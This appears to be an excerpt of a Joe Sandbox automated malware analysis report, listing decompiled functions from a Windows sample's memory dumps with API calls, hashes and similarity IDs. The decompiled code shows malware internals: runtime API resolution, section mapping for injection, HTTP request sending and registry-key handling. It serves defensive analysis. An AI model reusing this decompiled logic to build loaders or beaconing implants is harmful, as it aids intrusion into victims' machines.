                              • Part of subcall function 006D6779: sprintf.NTDLL ref: 006D6801
                            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D22AC
                            • lstrlen.KERNEL32(00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D22B4
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • strcpy.NTDLL ref: 006D22CB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D22D6
                              • Part of subcall function 006D44D8: lstrlen.KERNEL32(00000000,00000000,006D3831,00000000,?,006D22E5,00000000,006D3831,?,7491C740,006D3831,00000000,014A9600), ref: 006D44E9
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,006D3831,?,7491C740,006D3831,00000000,014A9600), ref: 006D22F3
                              • Part of subcall function 006D17F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,006D22FF,00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D17FA
                              • Part of subcall function 006D17F0: _snprintf.NTDLL ref: 006D1858
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                            • String ID: =
                            • API String ID: 2864389247-1428090586
                            • Opcode ID: 4db29876a2f8e6bc82a2b1c8fc8727f2a82c849e8c3a9d4a48d90c819d0db332
                            • Instruction ID: 16a778ebe7bf2d37d924cc9b9ed2f1946385ac9b82b7e3776a8e382576e315c7
                            • Opcode Fuzzy Hash: 4db29876a2f8e6bc82a2b1c8fc8727f2a82c849e8c3a9d4a48d90c819d0db332
                            • Instruction Fuzzy Hash: 47119133D0522577476277B89C45CAE3BAF8E99750316002FF5009B312DB64CD0197E6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D5E6F Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 337 6d5e6f-6d5ea1 call 6d58f8 340 6d5f89-6d5f8f 337->340 341 6d5ea7-6d5eae call 6d5a69 337->341 343 6d5eb3-6d5eb7 341->343 344 6d5ebd-6d5ecf SysAllocString 343->344 345 6d5f80-6d5f85 343->345 346 6d5f4e-6d5f52 344->346 347 6d5ed1-6d5ee4 SysAllocString 344->347 345->340 349 6d5f5d-6d5f61 346->349 350 6d5f54-6d5f57 SysFreeString 346->350 347->346 348 6d5ee6-6d5eea 347->348 353 6d5eec-6d5ef6 SysAllocString 348->353 354 6d5efe-6d5f4c 348->354 351 6d5f6c-6d5f6e 349->351 352 6d5f63-6d5f66 SysFreeString 349->352 350->349 355 6d5f77-6d5f7c 351->355 356 6d5f70-6d5f71 SysFreeString 351->356 352->351 353->349 357 6d5ef8-6d5efa 353->357 354->346 355->345 356->355 357->354
                            APIs
                              • Part of subcall function 006D58F8: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,014A89D0,006D5E9D,?,?,?,?,?,?,?,?,?,?,?,006D5E9D), ref: 006D59C5
                              • Part of subcall function 006D5A69: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 006D5AA6
                              • Part of subcall function 006D5A69: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 006D5AD7
                            • SysAllocString.OLEAUT32(00000000), ref: 006D5EC9
                            • SysAllocString.OLEAUT32(0070006F), ref: 006D5EDD
                            • SysAllocString.OLEAUT32(00000000), ref: 006D5EEF
                            • SysFreeString.OLEAUT32(00000000), ref: 006D5F57
                            • SysFreeString.OLEAUT32(00000000), ref: 006D5F66
                            • SysFreeString.OLEAUT32(00000000), ref: 006D5F71
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                            • String ID:
                            • API String ID: 2831207796-0
                            • Opcode ID: 1674b508dcbf2622cbea67b75ebde5180d69d21b651ecfd841edf1abc5c317dc
                            • Instruction ID: d360474d6687bd43bcde2d9980f0480cc82435a6b02604bd02552b3dfd9ef27e
                            • Opcode Fuzzy Hash: 1674b508dcbf2622cbea67b75ebde5180d69d21b651ecfd841edf1abc5c317dc
                            • Instruction Fuzzy Hash: 45415331D00A09AFDB01DFB8D844AEFB7BAAF49300F14446AE911EB260DB719D05CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401B39 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00401B39(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E0040181A(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x403184 + 0x404014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x403184 + 0x404151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E0040147E(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x403184 + 0x404161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x403184 + 0x404174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x403184 + 0x404189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x403184 + 0x40419f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E00401D95(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                            0x00401b47
                            0x00401b4b
                            0x00401c0c
                            0x00401b51
                            0x00401b69
                            0x00401b78
                            0x00401b7f
                            0x00401b81
                            0x00401b86
                            0x00401c04
                            0x00401c05
                            0x00401b88
                            0x00401b95
                            0x00401b97
                            0x00401b9c
                            0x00000000
                            0x00401b9e
                            0x00401bab
                            0x00401bad
                            0x00401bb2
                            0x00000000
                            0x00401bb4
                            0x00401bc1
                            0x00401bc3
                            0x00401bc8
                            0x00000000
                            0x00401bca
                            0x00401bd7
                            0x00401bd9
                            0x00401bde
                            0x00000000
                            0x00401be0
                            0x00401be6
                            0x00401bec
                            0x00401bf1
                            0x00401bf6
                            0x00401bfb
                            0x00000000
                            0x00401bfd
                            0x00401c00
                            0x00401c00
                            0x00401bfb
                            0x00401bde
                            0x00401bc8
                            0x00401bb2
                            0x00401b9c
                            0x00401b86
                            0x00401c1a

                            APIs
                              • Part of subcall function 0040181A: HeapAlloc.KERNEL32(00000000,?,004014BA,00000030,?,00000000), ref: 00401826
                            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,004018B1,?,?,?,?,?,00000002,?,?), ref: 00401B5D
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401B7F
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401B95
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401BAB
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401BC1
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401BD7
                              • Part of subcall function 00401D95: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401DF2
                              • Part of subcall function 00401D95: memset.NTDLL ref: 00401E14
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                            • String ID:
                            • API String ID: 1632424568-0
                            • Opcode ID: 69b94d7d7b042312cfe0a202c9dcd1738c3531b62b0226c4a5812b8c41c682d3
                            • Instruction ID: d3c3635dfac63004e6023c36051fb9f2085c9b8f0634433d2a6b82aac8f12b84
                            • Opcode Fuzzy Hash: 69b94d7d7b042312cfe0a202c9dcd1738c3531b62b0226c4a5812b8c41c682d3
                            • Instruction Fuzzy Hash: 34212DF160464BAFEB11DF6ADD44D6BB7ECAF44305700447AEA05EB261DB74EA00CB68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D2C73 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D2C73(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0) {
					_t9 = E006D452E(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
					if(_t9 == 0) {
						L9:
						return GetLastError();
					}
				}
				_t10 = E006D7B59(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                            0x006d2c73
                            0x006d2c80
                            0x006d2c82
                            0x006d2c8d
                            0x006d2c94
                            0x006d2ce5
                            0x00000000
                            0x006d2ce5
                            0x006d2c94
                            0x006d2c9a
                            0x006d2ca1
                            0x006d2cad
                            0x006d2cb2
                            0x006d2cc8
                            0x006d2cd8
                            0x00000000
                            0x006d2cca
                            0x006d2cca
                            0x006d2cd1
                            0x006d2cde
                            0x006d2cde
                            0x006d2cde
                            0x006d2cd1
                            0x006d2cc8
                            0x006d2ce3
                            0x00000000
                            0x00000000
                            0x006d2ce9

                            APIs
                            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,006D5D46,?,?,74CF81D0,00000000), ref: 006D2CAD
                            • ResetEvent.KERNEL32(?), ref: 006D2CB2
                            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 006D2CBF
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?,?), ref: 006D2CCA
                            • GetLastError.KERNEL32(?,?,00000102,006D5D46,?,?,74CF81D0,00000000), ref: 006D2CE5
                              • Part of subcall function 006D452E: lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,006D2C92,?,?,?,?,00000102,006D5D46,?,?,74CF81D0), ref: 006D453A
                              • Part of subcall function 006D452E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,006D2C92,?,?,?,?,00000102,006D5D46,?), ref: 006D4598
                              • Part of subcall function 006D452E: lstrcpy.KERNEL32(00000000,00000000), ref: 006D45A8
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?), ref: 006D2CD8
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                            • String ID:
                            • API String ID: 3739416942-0
                            • Opcode ID: f91a4d75e96fda17c69b30abee59cd4513ffd3a1147f97f461062e7837afc186
                            • Instruction ID: 3c3debbc2b41fdd9b1cf97798dcd5ac9b46982565289f14bfd58e0ba36acc128
                            • Opcode Fuzzy Hash: f91a4d75e96fda17c69b30abee59cd4513ffd3a1147f97f461062e7837afc186
                            • Instruction Fuzzy Hash: 4501AD31910202ABD7706B61ED45FAF77ABBFA4364F20072BF551E12E0DA20EC14DA65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D2331 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E006D2331(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x6da3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E006D3D2E( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E006D2087(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E006D789E(_a8);
						goto L29;
					}
					_t64 =  *0x6da318; // 0x14a9de0
					_t16 = _t64 + 0xc; // 0x14a9f02
					_t65 = E006D3D2E(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d006d90, executed
						_t67 = E006D6BEB(_t97,  *_t33, _t91, _a8,  *0x6da3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x6da348; // 0xdcd5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x6dba3e; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x6dba39; // 0x55434b48
								_t69 = _t34;
							}
							if(E006D41C5(_t69,  *0x6da3d4,  *0x6da3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x6da348; // 0xdcd5a8
									_t44 = _t71 + 0x6db842; // 0x74666f53
									_t73 = E006D3D2E(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d006d90
										E006D187F( *_t47, _t91, _a8,  *0x6da3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d006d90
										E006D187F( *_t49, _t91, _t99,  *0x6da3d0, _a16);
										E006D789E(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d006d90
									E006D187F( *_t40, _t91, _a8,  *0x6da3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d006d90, executed
									E006D187F( *_t43, _t91, _a8,  *0x6da3d0, _a16); // executed
								}
								if( *_t101 != 0) {
									E006D789E(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d006d90, executed
					_t81 = E006D78B3( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d006d90
							E006D6BEB(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E006D789E(_t100);
						_t98 = _a16;
					}
					E006D789E(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E006D7A86(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x6da3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                            0x006d2331
                            0x006d233a
                            0x006d2341
                            0x006d2346
                            0x006d23b3
                            0x006d23b9
                            0x006d23be
                            0x006d23c5
                            0x006d23ca
                            0x006d23cf
                            0x006d253a
                            0x006d2541
                            0x006d2541
                            0x006d2546
                            0x006d2548
                            0x006d2548
                            0x006d2551
                            0x006d2551
                            0x006d23d5
                            0x006d23da
                            0x006d23e1
                            0x006d2530
                            0x006d2533
                            0x00000000
                            0x006d2533
                            0x006d23e7
                            0x006d23ec
                            0x006d23ef
                            0x006d23f4
                            0x006d23f9
                            0x006d2442
                            0x006d2442
                            0x006d2455
                            0x006d2458
                            0x006d245f
                            0x006d2465
                            0x006d246c
                            0x006d2476
                            0x006d2476
                            0x006d246e
                            0x006d246e
                            0x006d246e
                            0x006d246e
                            0x006d2498
                            0x006d24a0
                            0x006d24ce
                            0x006d24d3
                            0x006d24da
                            0x006d24df
                            0x006d24e3
                            0x006d2515
                            0x006d24e5
                            0x006d24f2
                            0x006d24f5
                            0x006d2505
                            0x006d2508
                            0x006d250e
                            0x006d250e
                            0x006d24a2
                            0x006d24af
                            0x006d24b2
                            0x006d24c4
                            0x006d24c7
                            0x006d24c7
                            0x006d251f
                            0x006d252b
                            0x006d2521
                            0x006d2524
                            0x006d2524
                            0x006d251f
                            0x006d2498
                            0x00000000
                            0x006d245f
                            0x006d2408
                            0x006d240b
                            0x006d2412
                            0x006d2418
                            0x006d241b
                            0x006d241d
                            0x006d2429
                            0x006d242c
                            0x006d242c
                            0x006d2432
                            0x006d2437
                            0x006d2437
                            0x006d243d
                            0x00000000
                            0x006d243d
                            0x006d234b
                            0x00000000
                            0x006d2372
                            0x006d2372
                            0x006d237e
                            0x006d2391
                            0x006d2397
                            0x006d239f
                            0x00000000
                            0x006d239f

                            APIs
                            • StrChrA.SHLWAPI(006D68B1,0000005F,00000000,00000000,00000104), ref: 006D2364
                            • lstrcpy.KERNEL32(?,?), ref: 006D2391
                              • Part of subcall function 006D3D2E: lstrlen.KERNEL32(?,00000000,014A9DE0,00000000,006D695F,014AA003,69B25F44,?,?,?,?,69B25F44,00000005,006DA00C,4D283A53,?), ref: 006D3D35
                              • Part of subcall function 006D3D2E: mbstowcs.NTDLL ref: 006D3D5E
                              • Part of subcall function 006D3D2E: memset.NTDLL ref: 006D3D70
                              • Part of subcall function 006D187F: lstrlenW.KERNEL32(?,?,?,006D24FA,3D006D90,80000002,006D68B1,006D1629,74666F53,4D4C4B48,006D1629,?,3D006D90,80000002,006D68B1,?), ref: 006D18A4
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            • lstrcpy.KERNEL32(?,00000000), ref: 006D23B3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                            • String ID: ($\
                            • API String ID: 3924217599-1512714803
                            • Opcode ID: 4e346372de6170dcf082c275717bbd7bb691cdf52b3c28ecfb91e78806943461
                            • Instruction ID: 812d12163b9cddcb9c95a506207606d2f5efba08088cd75b0f6c8e696a69d300
                            • Opcode Fuzzy Hash: 4e346372de6170dcf082c275717bbd7bb691cdf52b3c28ecfb91e78806943461
                            • Instruction Fuzzy Hash: 82515A32D0020AEFCF219FA0EC50EAA7BBBEF58300F10856AF91596321D731D925EB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D10AD Relevance: 7.7, APIs: 5, Instructions: 161memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 59%
                            			E006D10AD(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				CHAR* _t37;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t52;
				signed char _t57;
				intOrPtr _t59;
				signed int _t60;
				void* _t64;
				CHAR* _t68;
				CHAR* _t69;
				char* _t70;
				void* _t71;

				_t62 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E006D39E3();
				if(_t21 != 0) {
					_t60 =  *0x6da2fc; // 0x2000000a
					_t56 = (_t60 & 0xf0000000) + _t21;
					 *0x6da2fc = (_t60 & 0xf0000000) + _t21;
				}
				_t22 =  *0x6da178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E006D40F0( &_v8,  &_v20); // executed
					_t55 = _t25;
					_t26 =  *0x6da348; // 0xdcd5a8
					if( *0x6da2fc > 5) {
						_t8 = _t26 + 0x6db5c5; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x6db9ef; // 0x44283a44
						_t27 = _t7;
					}
					E006D65DB(_t27, _t27);
					_t31 = E006D60A1(_t62,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t64 = 5;
					if(_t55 != _t64) {
						_t32 = E006D1F1D();
						 *0x6da310 =  *0x6da310 ^ 0x81bbe65d;
						 *0x6da36c = _t32;
						_t33 = E006D7A71(0x60);
						 *0x6da3cc = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t33, 0, 0x60);
							_t50 =  *0x6da3cc; // 0x14a9600
							_t71 = _t71 + 0xc;
							__imp__(_t50 + 0x40);
							_t52 =  *0x6da3cc; // 0x14a9600
							 *_t52 = 0x6db827;
						}
						_t55 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t37 = RtlAllocateHeap( *0x6da2d8, 0, 0x43);
							 *0x6da368 = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t57 =  *0x6da2fc; // 0x2000000a
								_t62 = _t57 & 0x000000ff;
								_t59 =  *0x6da348; // 0xdcd5a8
								_t13 = _t59 + 0x6db552; // 0x697a6f4d
								_t56 = _t13;
								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x6d927b);
							}
							_t55 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E006D54EC( ~_v8 &  *0x6da310, 0x6da00c); // executed
								_t43 = E006D2792(0, _t56, _t64, 0x6da00c); // executed
								_t55 = _t43;
								__eflags = _t55;
								if(_t55 != 0) {
									goto L30;
								}
								_t44 = E006D68F8(); // executed
								__eflags = _t44;
								if(_t44 != 0) {
									__eflags = _v8;
									_t68 = _v12;
									if(_v8 != 0) {
										L29:
										_t45 = E006D517A(_t62, _t68, _v8); // executed
										_t55 = _t45;
										goto L30;
									}
									__eflags = _t68;
									if(__eflags == 0) {
										goto L30;
									}
									_t55 = E006D4F6E(__eflags,  &(_t68[4]));
									__eflags = _t55;
									if(_t55 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t55 = 8;
							}
						}
					} else {
						_t69 = _v12;
						if(_t69 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x6da17c();
							}
							goto L34;
						}
						_t70 =  &(_t69[4]);
						do {
						} while (E006D5854(_t64, _t70, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t55 = _t22;
					L34:
					return _t55;
				}
			}
































                            0x006d10ad
                            0x006d10b7
                            0x006d10ba
                            0x006d10bd
                            0x006d10c0
                            0x006d10c7
                            0x006d10c9
                            0x006d10d5
                            0x006d10d7
                            0x006d10d7
                            0x006d10e0
                            0x006d10e6
                            0x006d10eb
                            0x006d1105
                            0x006d1111
                            0x006d1113
                            0x006d1118
                            0x006d1122
                            0x006d1122
                            0x006d111a
                            0x006d111a
                            0x006d111a
                            0x006d111a
                            0x006d1129
                            0x006d1136
                            0x006d113d
                            0x006d1142
                            0x006d1142
                            0x006d114b
                            0x006d114e
                            0x006d1174
                            0x006d1179
                            0x006d1185
                            0x006d118a
                            0x006d118f
                            0x006d1194
                            0x006d1196
                            0x006d11c2
                            0x006d11c4
                            0x006d1198
                            0x006d119c
                            0x006d11a1
                            0x006d11a6
                            0x006d11ad
                            0x006d11b3
                            0x006d11b8
                            0x006d11be
                            0x006d11c5
                            0x006d11c7
                            0x006d11c9
                            0x006d11d8
                            0x006d11de
                            0x006d11e3
                            0x006d11e5
                            0x006d1215
                            0x006d1217
                            0x006d11e7
                            0x006d11e7
                            0x006d11ed
                            0x006d11fa
                            0x006d1200
                            0x006d1200
                            0x006d1208
                            0x006d1211
                            0x006d1218
                            0x006d121a
                            0x006d121c
                            0x006d1223
                            0x006d1230
                            0x006d1235
                            0x006d123a
                            0x006d123c
                            0x006d123e
                            0x00000000
                            0x00000000
                            0x006d1240
                            0x006d1245
                            0x006d1247
                            0x006d124e
                            0x006d1252
                            0x006d1255
                            0x006d126a
                            0x006d126e
                            0x006d1273
                            0x00000000
                            0x006d1273
                            0x006d1257
                            0x006d1259
                            0x00000000
                            0x00000000
                            0x006d1264
                            0x006d1266
                            0x006d1268
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d1268
                            0x006d124b
                            0x006d124b
                            0x006d121c
                            0x006d1150
                            0x006d1150
                            0x006d1155
                            0x006d1275
                            0x006d127a
                            0x006d1282
                            0x006d1282
                            0x00000000
                            0x006d127a
                            0x006d115b
                            0x006d115e
                            0x006d1168
                            0x006d116f
                            0x00000000
                            0x006d128a
                            0x006d128a
                            0x006d128d
                            0x006d1291
                            0x006d1291

                            APIs
                              • Part of subcall function 006D39E3: GetModuleHandleA.KERNEL32(4C44544E,00000000,006D10C5,00000001), ref: 006D39F2
                            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 006D1142
                              • Part of subcall function 006D1F1D: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 006D1F41
                              • Part of subcall function 006D1F1D: wsprintfA.USER32 ref: 006D1FA5
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • memset.NTDLL ref: 006D119C
                            • RtlInitializeCriticalSection.NTDLL(014A95C0), ref: 006D11AD
                              • Part of subcall function 006D4F6E: memset.NTDLL ref: 006D4F88
                              • Part of subcall function 006D4F6E: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 006D4FCE
